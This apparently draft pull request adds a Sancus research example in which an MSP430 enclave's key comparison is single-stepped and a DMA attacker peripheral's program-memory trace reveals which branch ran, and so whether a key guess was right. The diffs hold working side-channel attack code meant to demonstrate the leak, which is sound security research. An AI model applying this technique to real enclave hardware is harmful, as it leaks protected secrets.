### PR TITLE
DMA

### DIFF
--- a/dma-side-channel/Makefile
+++ b/dma-side-channel/Makefile
@@ -1,0 +1,26 @@
+include ../Makefile.include
+
+SOURCES         = $(shell ls *.c)
+OBJECTS         = $(SOURCES:.c=.o)
+
+TARGET          = main.elf
+TARGET_NO_MAC   = no_mac_$(TARGET)
+
+all: $(TARGET)
+
+$(TARGET_NO_MAC): $(OBJECTS)
+	$(LD) $(LDFLAGS) -lsancus-step  -o $@ $^
+
+$(TARGET): $(TARGET_NO_MAC)
+	$(SANCUS_CRYPTO) --fill-macs $(CRYPTOFLAGS) -o $@ $<
+
+load: $(TARGET)
+	$(SANCUS_LOAD) $(LOADFLAGS) $<
+
+sim: $(TARGET)
+	$(SANCUS_SIM) $(SIMFLAGS) $<
+
+clean:
+	$(RM) $(TARGET) $(TARGET_NO_MAC) $(OBJECTS)
+	rm -f sim-input.bin sim-output.bin
+	rm -f *.fst *.vcd

--- a/dma-side-channel/main.c
+++ b/dma-side-channel/main.c
@@ -39,13 +39,11 @@ void SM_ENTRY(foo) test(char key) {
  *
  * Using TRACE_MASK to get the bit that differs in the two possible traces, we
  * can tell whether a collected trace was generated as a result of a correct or
- *  an incorrect guess.
+ * an incorrect guess.
  */
 
 void irqHandler(void)
 {
-    __ss_set_dma_attacker_delay(0);
-    uint16_t *pmem_addr = (uint16_t*) irqHandler;
     if (instruction_counter == INSTRUCTION_NUMBER_JMP) {
         if (DMA_TRACE & TRACE_MASK) {
             pr_info("Key was not guessed!");
@@ -54,8 +52,9 @@ void irqHandler(void)
         }
     }
     ++instruction_counter;
+    __ss_set_dma_attacker_delay(0);
+    uint16_t *pmem_addr = (uint16_t*) irqHandler;
     DMA_ADDR = pmem_addr;
-    DMA_COUNTDOWN = delay;
 }
 
 int main()

--- a/dma-side-channel/main.c
+++ b/dma-side-channel/main.c
@@ -1,0 +1,81 @@
+#include <stdint.h>
+#include <msp430.h>
+#include <sancus/sm_support.h>
+#include <sancus_support/sm_io.h>
+#include <sancus_support/sancus_step.h>
+
+#define MAX_COUNTER (0xf)
+
+int instrAfterCtr = 0;
+uint16_t **dma_addr      = (uint16_t**) 0x0070;
+uint16_t *dma_countdown = (uint16_t*) 0x0072;
+uint16_t *dma_trace     = (uint16_t*) 0x0074;
+uint16_t delay = 0;
+
+DECLARE_SM(foo, 0x1234);
+
+void SM_ENTRY(foo) test(char key) {
+    char * p = &key;
+    __asm__ __volatile__(
+        "mov %0, r6\n\t"
+        "mov #0x42, r7\n\t"
+        "cmp.b @r6+, r7\n\t"
+        "jz 1f\n\t"
+        "bis #0x1, r7\n\t"
+        "jmp 2f\n\t"
+        "1: nop\n\t"
+        "nop\n\t"
+        "nop\n\t"
+        "2: nop\n\t"
+        :
+        :"m"(p)
+        :"r6", "r7"
+    );
+}
+
+/*
+ * For the JMP 2f instruction, the program memory trace will be 0000111111000000
+ * For the NOP    instruction, the program memory trace will be 0000111110000000
+ *
+ * By checking the different bit at the 0x40 position, we can tell which branch
+ * was taken (the JPM is executed if the guess was incorrect, after the
+ * bit is set).
+ *
+ * Both the +30 for the delay and the 36 for the instruction value are
+ * determined empirically.
+ */
+
+void irqHandler(void)
+{
+    delay = __ss_isr_reti_latency + 30;
+    uint16_t *pmem_addr = (uint16_t*) irqHandler;
+    pr_info1("%x\n", *dma_trace);
+    if (instrAfterCtr == 36) {
+        if (*dma_trace & 0x40) {
+            pr_info("Key was not guessed!");
+        } else {
+            pr_info("Key was guessed!");
+        }
+    }
+    ++instrAfterCtr;
+    *dma_addr = pmem_addr;
+    *dma_countdown = delay;
+}
+
+int main()
+{
+    msp430_io_init();
+    asm("eint\n\t");
+    sancus_enable(&foo);
+
+    __ss_start();
+    test(0x41);
+    instrAfterCtr = 0;
+    __ss_start();
+    test(0x42);
+
+    EXIT();
+}
+
+/* ======== TIMER A ISR ======== */
+SANCUS_STEP_ISR_ENTRY2(irqHandler, __ss_end)

--- a/dma-side-channel/main.c
+++ b/dma-side-channel/main.c
@@ -35,8 +35,8 @@ void SM_ENTRY(foo) test(char key) {
 }
 
 /*
- * For the JMP 2f instruction, the program memory trace will be 00001111 11000000
- * For the NOP    instruction, the program memory trace will be 00001111 10000000
+ * For the JMP 2f instruction, the program memory trace will be 00011111 10000000
+ * For the NOP    instruction, the program memory trace will be 00011111 00000000
  *
  * By checking the different bit at the 0x40 position, we can tell which branch
  * was taken (the JPM is executed if the guess was incorrect, after the
@@ -48,7 +48,7 @@ void irqHandler(void)
     delay = __ss_isr_reti_latency + DELAY_BEFORE_SM;
     uint16_t *pmem_addr = (uint16_t*) irqHandler;
     if (instruction_counter == INSTRUCTION_NUMBER_JMP) {
-        if (*dma_trace & 0x40) {
+        if (*dma_trace & 0x80) {
             pr_info("Key was not guessed!");
         } else {
             pr_info("Key was guessed!");

--- a/dma-side-channel/main.c
+++ b/dma-side-channel/main.c
@@ -8,9 +8,9 @@
 #define INSTRUCTION_NUMBER_JMP 36
 
 int instruction_counter = 0;
-uint16_t **dma_addr      = (uint16_t**) 0x0070;
-uint16_t *dma_countdown = (uint16_t*) 0x0072;
-uint16_t *dma_trace     = (uint16_t*) 0x0074;
+uint16_t **dma_addr     = (uint16_t**) 0x0070;
+uint16_t *dma_countdown = (uint16_t*)  0x0072;
+uint16_t *dma_trace     = (uint16_t*)  0x0074;
 uint16_t delay = 0;
 
 DECLARE_SM(foo, 0x1234);

--- a/dma-side-channel/main.c
+++ b/dma-side-channel/main.c
@@ -1,16 +1,13 @@
 #include <stdint.h>
 #include <msp430.h>
 #include <sancus/sm_support.h>
+#include <sancus_support/dma_attacker.h>
 #include <sancus_support/sm_io.h>
 #include <sancus_support/sancus_step.h>
 
-#define DELAY_BEFORE_SM 30
 #define INSTRUCTION_NUMBER_JMP 36
-
+#define TRACE_MASK 0x1000
 int instruction_counter = 0;
-uint16_t **dma_addr     = (uint16_t**) 0x0070;
-uint16_t *dma_countdown = (uint16_t*)  0x0072;
-uint16_t *dma_trace     = (uint16_t*)  0x0074;
 uint16_t delay = 0;
 
 DECLARE_SM(foo, 0x1234);
@@ -35,28 +32,30 @@ void SM_ENTRY(foo) test(char key) {
 }
 
 /*
- * For the JMP 2f instruction, the program memory trace will be 00011111 10000000
- * For the NOP    instruction, the program memory trace will be 00011111 00000000
+ * For the JMP 2f instruction, the program memory trace will be 11110000 00000000
+ * For the NOP    instruction, the program memory trace will be 11100000 00000000
+ * The JMP is instruction is executed if the guess was incorrect, the NOP if it
+ * was correct.
  *
- * By checking the different bit at the 0x40 position, we can tell which branch
- * was taken (the JPM is executed if the guess was incorrect, after the
- * bit is set).
+ * Using TRACE_MASK to get the bit that differs in the two possible traces, we
+ * can tell whether a collected trace was generated as a result of a correct or
+ *  an incorrect guess.
  */
 
 void irqHandler(void)
 {
-    delay = __ss_isr_reti_latency + DELAY_BEFORE_SM;
+    __ss_set_dma_attacker_delay(0);
     uint16_t *pmem_addr = (uint16_t*) irqHandler;
     if (instruction_counter == INSTRUCTION_NUMBER_JMP) {
-        if (*dma_trace & 0x80) {
+        if (DMA_TRACE & TRACE_MASK) {
             pr_info("Key was not guessed!");
         } else {
             pr_info("Key was guessed!");
         }
     }
     ++instruction_counter;
-    *dma_addr = pmem_addr;
-    *dma_countdown = delay;
+    DMA_ADDR = pmem_addr;
+    DMA_COUNTDOWN = delay;
 }
 
 int main()


### PR DESCRIPTION
This example showcases how an attacker can differentiate secret-dependent control flows using the DMA-capable attacker peripheral and sancus-step. (Very similar to the sancus-step example.)

Currently only a draft PR, because the implementation might still change depending on changes in the attacker peripheral or sancus-step.

Any comments or requests are welcome! 